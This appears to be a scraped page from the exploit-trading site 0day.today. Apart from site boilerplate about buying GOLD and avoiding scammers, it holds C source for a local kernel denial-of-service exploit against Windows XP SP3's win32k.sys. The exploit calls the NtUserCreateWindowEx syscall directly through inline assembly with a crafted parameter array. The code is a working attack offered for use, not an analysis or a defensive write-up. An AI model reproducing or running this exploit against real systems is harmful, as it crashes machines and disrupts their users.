0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Microsoft Windows xp Win32k.sys Local Kernel DoS
//////////////////////////////////////////////////////////////////////////// // // Title: Microsoft Windows xp Win32k.sys Local Kernel DoS Vulnerability // Author: Lufeng Li of Neusoft Corporation // Vendor: www.microsoft.com // Vulnerable: Windows xp sp3(full patch) // ///////////////////////////////////////////////////////////////////////////// #include <Windows.h> #include <stdio.h> void NtUserCreateWindowEx(HANDLE d1,int d2,int d3) { _asm{ xor eax,eax push eax push eax push eax push eax push eax push eax push eax push eax push eax push eax push eax push eax push d3 push d2 push d1 push eax mov eax,0x1157 mov edx,7FFE0300h call dword ptr[edx] ret 0x3c } } void main() { UINT i=0; UINT c[]={ 0x00000000,0x28001500,0xff7c98cc,0x23ffffff ,0x167c98cc,0x007c98fb,0x02001500,0x78010000 ,0x00000000,0x00001500,0x00000000,0x00001500 ,0x00000000,0x00001500,0x00000000,0x00000000 ,0x00000000,0x00000000,0x34000000,0x3cc00000 ,0x5c0007fb,0x617c92f6,0x347c92f6,0x00c00000 ,0x00000000,0x18000000,0x000007fb,0xf8000000 ,0x200007fd,0x347c92e9,0x02c00000,0x4c000000 }; HWND _wnd = CreateWindowEx(WS_EX_TOPMOST, "magic", "magic", WS_POPUP, 100, 100, 100, 100, 0, 0, GetModuleHandle( 0 ), 0); NtUserCreateWindowEx(_wnd,0x26,(UINT)c); } # 0day.today [2024-11-16] #